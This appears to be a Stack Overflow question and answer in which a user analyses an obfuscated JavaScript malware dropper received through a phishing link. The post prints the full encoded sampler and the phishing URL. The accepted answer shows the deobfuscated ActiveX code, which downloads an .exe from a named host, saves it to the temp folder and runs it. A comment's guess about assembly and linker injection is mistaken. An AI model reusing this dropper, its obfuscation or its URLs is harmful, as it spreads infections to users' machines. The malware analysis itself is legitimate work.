# Javascript malware. How to study a ciphered function?

Tags: javascript, debugging, malware

I have received an fake e-mail linking a website, **---DANGER---** kadiogluhotel.com/437019344HKFAHDzE9ykByni6Qd2TQSfkSYy2z7=
Q7FftdKRHHaY8y96R6H668tf8KaZ69ttKzhyRRayafkHeaDY79Q38887G9TD9aYKA66dH6/TmFu=
ZG8=3D/KaNTmFuZG8=3D/ **---DANGER---**  that tries to download a zip file only if your browser user-agent is setted to some Windows configuration. This zip file contains a little js file and copy himself into the new folder.

I have tried to study the code but, really, I have been interested in javascript only since a few months. I need some help.

I have tried to execute the code in the chrome console over a debian virtual machine protected by firejail, but I have not been able to extract in plain text the returned function, "wxmvg",that is doing the work. The virus payload seems to be unable to run into linux, or I have not been able to detect it.

What steps should I take to decipher the function?

Thank you!

The code looks like:

**--------WARNING MALWARE---------------------------**

```
function fubrc()
{
    var rshcb="a6c56d9745b875ef1553fcd44d2a59bbc5fd685eeaf10cb357eb955f4144a7874c3951fe544d9651bc276a5742d425fcac5dd9865a4b42a635cdc618a0545c4c42f905ce0f1cb3210cab53a5451d785cc9c5cc3052f5451ab753e8e5bc6919c0b4bce644a2a42cb149e104bd9b46b6151c8b42e6410ed048c445daa35ccc578a3e44a1e44fa940ced10c750db6a10c395ea0b55ba747c2310f4671d6653d1144a7e59af746b2b55e8f68c987fbc352d355afd855a9c53c3c44c5418c6212fa37dc0a63c2368e5f7ded27cb0e02fa81ec1068b8f7ddc47cd9d78f1864c7964d4d60c4b12d8619d3e0baa148de85dd855cf1d78ddd44a4544dd940c6b1ebf45fd8640d8155d2e5ea0718c6812be577a2975bb664e4a12d791cfe110a8845a1942a225cc881cea810bb956f1551af85cf8f43b4f55b6619f870bb9848c1e5dfe05cb4678ff644ae544dab40cff1ec3443fdb55a255ed8554d5518b0819c770be8659a2156f9f10fe218ebe48fd15de895cb2c78d4744abc44c0540fb61ef9f43f5d44f5951f1744fed45b4f43ac310cdf0db490dde510ecd02f8300d4700af819da710cea4bb1842c8555ca944e3945b1542acb5ea7e10d0f53a2051c995cad95cd5e52fba51b0d53fcf5badb18ee348f9b5df9d5cbe678f2344c0844b8340ecc1ef0062fb755c9643d6f40b175fa665ec2743d8155"+
    "ac872bb55fe0d54d5949ea21cb4710b8856d9c51eef5cc0643c0355ecd19bc70ba6b4dd5755f005cac243d7a55c704bbc342d5c55f4044d7745a8b42f215eab010fd753e7d51cc45ca115cba552a7851f1f53a165bfd718fe35ecb145f075cd245ce341ce8f10a9544d4542d5645e2355bd319c4f0bc184deb04da0b53b8451b0c44c5153fc558a0710bd418c5855ca942e9442c0c5fbf542c2d19b034bb6f42c8855ec644a5045da542a9d5eb1710a4553ba751bce5cce55cb8c52f6951a8d53f185be2118f715eb8445dcd5ce1a5ce6a1cb9310e5844c6f42b1e45fe155ec719e1f0ba9a4de8a4dd6156b9045c8d5eef353e5444f2359ffe5fbce5eaf910fd157c8655ccd44a3574e2451ae844bb951c9818cc453cf251eae5ce375cb0352aa651c9853d075bad319d5b4bab844b3742c2149b244bf6c57e9855bfe44f9074aa751b5b44e6851caa76f1b42e6d5fa245deeb65b4042be35ce2c18b6112a5758cb144a9144e7740f880ae681fdab1fbfa47ccb47b1147b251ed0157db955d0e42a5751c3b5ceb754de557b625fa9342ab455c6c1ece853e015fea55db371fa235ecb255fe747fee43e1a1fa6101ebe07ca01ec9455dc648ac755b4312cf21cfb210fa256cc845ca45ec1d53e7644b1359d3e5fa635ebb218b8c42c4755c0443e1d45a7d5ce7544ca51cc5810c5c55d8942dc142"+
    "c245fe9d42a8d19e0410f004baf559c7956fdd10d7518a2111a8355c6b42a7342e5c5fb2642f2419a8a4bd4842cdf55fee44f2845e7d42d045ef0910dc053e0b51ab35cf675cbb552a8451a4553d3b5bcc518f9d42b2a55fe443d1e45fc55ca1e44c381cd5b10efd56d6051e135cf4443c1455d9419d410bf614dfb355b575ce2643faa55c9a4bd5d57fad55a4744bc074b0f51b7044caf51e0e76b7a42ec45fc695dc3365b3742d735cbac18af312f6c58d4644d6b44b4940dbd0aa111fb531fdd947f1347d3247ff71ec9057f3e55d8342aef51e1f5ce3454ab157f825fe1542ea455b3c1eeee53e975fa075de071fe905eaa555a6c47b4c43c281ff7001c6007c321ef4a55b3548dec55b1812c2d1cb6110ac356d8045bef5ef6253f3544d7759fe75fd375eaa918efd42eea55a9343fb245d885cd5a44ec11cb9110f2455a3d42d2c42d1c5fa3642bd219c7910e1d4bdf059d4356de510f1818fb911c4055b7b42db942f2e5fbee42a9d19d224bfb142a9255d4d44ab145de742c025ee5410e8453f9c51f4d5cf105ce2252ea651fb153e715bbc018cbf42d0755e7e43d2345cf45cac644ace1cc9b10d7256dad51b105caa343c9055c3b19d000bfa74dac355a5b5cfd243e7c55fac4bbb857c4155aa344f4c74ce751f1444e2851dd676fbc42d875fbc35df4665f5e42e135cf7318a3312"+
    "b2558fb344a8f44ee640b520ac261fffa1fffb47e0247ab447b151edde57fe855dd742e3b51a0d5cc7b54a4a57f445fe6e42aae55c5c1ecec53f005fb0c5dea71ff2d5ec3155ae447cd043bf41fb5801aa807e821ecba55ba648d7755cf012c101cf7710cb656dea45a265eded53d7944ba459d6a5fac95ed5018b1e42d6a55efa43deb45e9a5cf4244b9c1cd3210b4d55ff242b3342bc95feb742d6719b5e10e134ba6a59ffd56e1210fc118e2311a7f55d6a42efe42c455fc4542d5a19b294bae942ab655b9744b9c45b1342e115ee6510ab953c4c51a7f5cd8d5caa952cc251e3a53f7b5bf5b18e3242b4c55fa143cb845c5f5cb7944fd61ceb810c7f56b4351e255ce4943ff355f7f19bc30ba194dfc755aa35cd3943c6c55d4d4be4142c1e55dd744c2445d4542ae15ed1b10f0d53b1351ea75cf8a5ceda52e7851bd953d8c5bf0b18e3b5edd645c265cd2e5cef81cdc610bac44fea42b8245a5b55f2d19daa0be2c4dbad4dbab19f580ba034de624dca019dbd0bb9e4db1a4defb19d360bc6e4da1553d2d51ff344e7c53c1958b6110b9118e7e55de242a7742e985fb3042ae919bdf4ba5e42da655ded44df445d0442f005ea0310dd653bf551f325cd475cdc152e6151fef53a085bb5118e805ea1845c465cff95cf9b1cb3910b2d44bfd42be845d4c55f2419b350bf094da474dd1e56"+
    "c4345e845efc253df244a0559f575fe905eb5310f7757b1755a7044b5264ded55d9c5df0640a6076c6359a085cb6f55d9e60eb651d1a44f9a58d3418bfc19ff34bb6844c6242e9849e2e4bf1b46a0b51f5442cd710d3556cd443d3010aae0da0810d705ed4055b6447e3910a9771d3053e0844a2a59d2546d4d55ac468d577fb9c52c7f5aa0855c2053ae444c1518aa712c5063b6653cea42e3359da040da444e2559d255ef0557aae1ec1476a4959ca85ca8a55b2663e0e49a9243c2444ddc55ef85de687fa7b52fc65aafc55f3d53a1844a2e12b8219c2f0bb1d46de351a2042ec610bf444eb75dfd740be976b4e59b025cbc355a827eb0351f8f5da0d55c0010f770dba710ff012d446cf816ce9812eb210a991bab310e2b7dcd251e2c44bcb58e7e1ea3742a1f51dea5ef2354b3d5fc1e5da9d18b7f19aba1ef0144fb45faf463e9444d5642f9959df05ede257c4818b4303eec06ea819ab61ecaf43d4345eea52c0943a2944a8c42dbe18f0e02d801ca0510cef09b9319c8210aea1bfec10b2512ebe1ee9955e3148d4055fa912fe20be8046e9951d4942c8a10f7744d7e5da6240ad576faf59b6d5cc4555a3d60dd251a4944ffe58a9710abb0dad010c0456bf043a6d1ec6177bfd55ce144ebe63ed940bd455ae153d6a59ea051ccf5cb4576b935faf35cbfd54aca55f2942e3918ecf02"+
    "da919b3610a801bbc210cf144d2f5dc5b40aed76fde59bcb5ca7755f097eaa151dec5df8b55f2d0bd0242cc255a8f44abb45ed342b9b5ef0610f4644dfd5dbaf40a5976b0659ccc5cbf955ac660b1f51ed944bab58d500bc044dcb953e1351b6f44aad53db058efa10fc818b1255ea642d2e42f7a5fc6b42c9219c9b4bb1842ef655cb244ee345aec42c0d5ec7510aba56f4351f0b5cddc43eaa55b360bc264dd364dc9f56bf545de15eaa453b8d44aea59fe55fc485ef0910b3a43d8351cb246f4155f7b64eb35ffb364c8255fe55dacf40df118b7954cd551d9844d4d51b391ccf510d5c53deb51e285ceb75ce1d52c9a51f2353ba75bae919d774beeb44d0a42c9c49f794bb5946ab151f7242e0c10bab40e4351b3244ecb58d3510cea0de3f10c4057cf155dc044c2464ae855b405dc3740ad976b4859e205ce9d55c1b60ca951a2a44b4058f8d18cd119ffd0bc4159f4356c2b10b9c18a1840d3951b8b44e5458fb119f9f4bdf346db651f3742c7e10b8e5ff1252b505ae3d63bc944b8242a1e55b0b51d6d5dac510a1b0dabc10ae15eff355d2e47a5810b7871bb253e6744f7459a8446f8e55d0f68d6c7ffff52f135ab4055f8553f6a44b2118c3912fee71d9074d3f7fbec74bbc72ce11eea863b8c44ebf42e3255cd251c8a5de1c12e6c19d980bcf75fcd252e205ade563dd844f5642"+
    "fad55cad51b845da2c1ec8a7fed940eb055d695eef718c0b19f770bdd15fc1952d105ac9163a7f44d7a42aee55fdf51a495defe1eb8c64bdd49f8f40cd755cdd10c750da0510e5201e760bc545fc9b52bd05aea163e2d44b9b42bf355cfb51ffe5ded71eb5a67cb342af159ffa44fcb55d2518b4454cb351a7144a5f51c7419adf0bbed5fbab52a785af1963a6c44bc842cff55c1351b895dd071ecf660b515fe5843c1859e1c44f5959ba85fa185eb7e10ff00db7910dac00da10ba225fd1252bc75aee163b2244f6842f3755c7c51ee75df021efa363e3351e8f46c5f55c0164d775fa3076c0159b9e5cd5055f1518ef840eff51e6444ecd58e641cb6710ece02ee919eac0bd6d5fe3b52b3a5ab2e63ceb44bf242c4755e3451e245dc1d1ea0373e765cfb85fce043c7955aa718a3a19d1c0bfff42e5f55f8944e7e45b2b42f8a5ecd210eec53c2f51eae5cf8f5cd7452d4a51a3253a845bf4b18c0940d8851bc044bc558b9b1ca4310cd656af951aee5cbc443e4c55db419e110bd5d4df8755d005cde843ae655d1610d634bf5642dd255fc244f6645d3d42aa85ef5710a5753cd851e7c5ce425ccbf52c9b51d6153ee35bf1c18bb25edc745e555cc3b5cb3f1cb8010bd244e7842e5745ae855e3319ebe0bca44dd264db5953b9e51fbd44e9453c8858f9810b7018c6555bbe42d6142ea55f"+
    "cdc42ca819b014bce942eb155ce744e6c45ba842b5c5eb4710da553b1f51f685cec75ccc352c4351e3853d735ba0718ed05ec6445da55cd805ce671ccb410d3744fe042b0e45cb055f0819ced0bd994de114dd1657e7255be444da374bdc51a3944fe351b6218aea56ddb45d7b5ee7353a0344b4d59c7b5fb9f5ef6d10f0318ea254d4e51bd744acc51bc71cce010b7155e9942f4f42d285ffe242e9519ec310bdf4ba1a59c6a56a0110a8018d5d11dff55ebf42a0742c845fcb142cc119a574bf6e43f7851b2c46a0b55a9764e0e5fbe864d7355dde5ddd440a9918a5e54d0151bb044ac351cab1cc1b10e9356a3e45ecc5eac653dd044d6459daf5fbaa5ec2610a9618f6f40e6151e6c44f8058a371cdbb10e7755f0142c1342f3a5fae142af719acb10e834bc9559f3156d1710ec118a4111a1455f3342e4242b5f5fe3642a0f19c724bce244eff42ef349a244bbf646cb951ced42bee10f2047d9143f1e58fef10ffd0deef10a3d5ec9055a1947e6910e1071ca253c6344c2259bd146abe55ad368e5b7fc5b52a315ade255a7b53bd144c4318c9112cbb67cc063dad53b2342a3559aa540aca44e191ee7b63af558a7e55ffc5cc875cbc912cca19fd60bee347dc343ba058eb91ebcf62b0c45ee55ec4118e0d40d5a51e5044af758b2219fed0bb404db7453a7351bc644cbe53b5458e4910"+
    "c5718e8855e5842f0b42cd35fdd942f3619b8110aa64bc994deec4dbf54dfd019bb40be324dace4dd0219ec00b";
    var wxmvg;
    while(true){
        try
        {
            wxmvg=(new Function("tvxzi","var utwcv=tvxzi"+katho()+"/\\S{5}/g),vnosx=\"\",yrtpl"+katho()+"ile(yrtpl<utwcv"+katho()+"gth){vnosx+"+katho()+"e"+katho()+"utwcv[yrtpl].substr(3,2),16)^48);yrtpl++;}eval(vnosx);")(rshcb));
            break;
        }
        catch(er)
        {
        }
    }
    return wxmvg;
}

    function katho()
{
    var lrxbf=new Array("_3da","_gda","=String.fromCharCod","(parseInt(",".match(","=0;wh",".len","_aas","-_ad");
    return lrxbf[Math.floor(Math.random()*lrxbf.length)];
}
fubrc();
```

Comment: It's not really an appropriate question for StackOverflow, but a cool challenge nevertheless. Picking apart stuff like this, is interesting. The payload is probably in rshcb. My guess is it's i386 assembly code reduced to machine code hexbytes. And the rest of the code is some kind of injection scheme that either overflows a buffer or tries to insert or define some symbols that might be read by ld (linker) at runtime. Everytime you get an idea of what something is or does, fix it's name everywhere and take on the next puzzle. Eventually it might become clear.

Comment: I might start with trying to figure out what katho() is doing. That seems to be the heart of the insertion mechanism. Or see if you can convert the hex code back into assembler code somehow. This kind of thing usually takes a lot of determination, creativity and sleuthing, and the investigation can take you all over the place, but it's really intriguing. Nevertheless, this question should be closed, but I won't vote to to that this time, although I probably should because I'm on a review queue now evaluating it for closure (see "review" link at the top of the web page")

Comment: Hi clearlight!
I'm not sure if this kind of question is valuable. My main intention isn't the downloader as main problem, but the technics and tools for studying it. The answer of "I wrestled a bear once" has putted me on  the way.

As you say, the main question is how this stuff runs. I'm studying Javascript since a couple of months, and this code seems to  me so bizarre as for asking to more experienced people.

I wonder why the katho() function uses randomness for building the code into wxmvg. It seems really counterintuitive. I haven't an answer yet, but, I'm trying understand it.

Answer (score 2, accepted):

If you change the [`eval`](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/eval) call to [`console.log`](https://developer.mozilla.org/en-US/docs/Web/API/Console/log) it will print the code in the console instead of executing it.

Once you have the code you can run it thru a [beautifier](http://jsbeautifier.org/) to make it readable, and you'll get something like this...

```
function getDataFromUrl(url, callback) {
    try {
        var xmlHttp = new ActiveXObject("MSXML2.XMLHTTP");
        xmlHttp.open("GET", url, false);
        xmlHttp.send();
        if (xmlHttp.status == 200) {
            return callback(xmlHttp.ResponseBody, false);
        } else {
            return callback(null, true);
        }
    } catch (error) {
        return callback(null, true);
    }
}

function getData(callback) {
    try {
        getDataFromUrl("http://www.geraldgore.com/news/17.exe", function(result, error) {
            if (!error) {
                return callback(result, false);
            } else {
                getDataFromUrl("http://www.geraldgore.com/news/17.exe", function(result, error) {
                    if (!error) {
                        return callback(result, false);
                    } else {
                        getDataFromUrl("http://www.geraldgore.com/news/17.exe", function(result, error) {
                            if (!error) {
                                return callback(result, false);
                            } else {
                                return callback(null, true);
                            }
                        });
                    }
                });
            }
        });
    } catch (error) {
        return callback(null, true);
    }
}

function getTempFilePath() {
    try {
        var fs = new ActiveXObject("Scripting.FileSystemObject");
        var tmpFileName = "\\" + Math.random().toString(36).substr(2, 9) + ".exe";
        var tmpFilePath = fs.GetSpecialFolder(2) + tmpFileName;
        return tmpFilePath;
    } catch (error) {
        return false;
    }
}

function saveToTemp(data, callback) {
    try {
        var path = getTempFilePath();
        if (path) {
            var objStream = new ActiveXObject("ADODB.Stream");
            objStream.Open();
            objStream.Type = 1;
            objStream.Write(data);
            objStream.Position = 0;
            objStream.SaveToFile(path, 2);
            objStream.Close();
            return callback(path, false);
        } else {
            return callback(null, true);
        }
    } catch (error) {
        return callback(null, true);
    }
}
getData(function(data, error) {
    if (!error) {
        saveToTemp(data, function(path, error) {
            if (!error) {
                try {
                    var wsh = new ActiveXObject("WScript.Shell");
                    wsh.Run(path);
                } catch (error) {}
            }
        });
    }
});
```

What does it do? It takes advantage of crappy old Active X (for Internet Explorer users) by downloading an executable from the web, saving it to the user's computer and then executing it.

This in and of itself just downloads and executes a file and may or may not actually be malware. I did not inspect the executable nor the website they are downloaded from. For all I know this may be a tech support software.

Comment: Thank you very much!

**Notice: I am pretty sure that it is malware code since I have received it from a fake address. Be cautious!**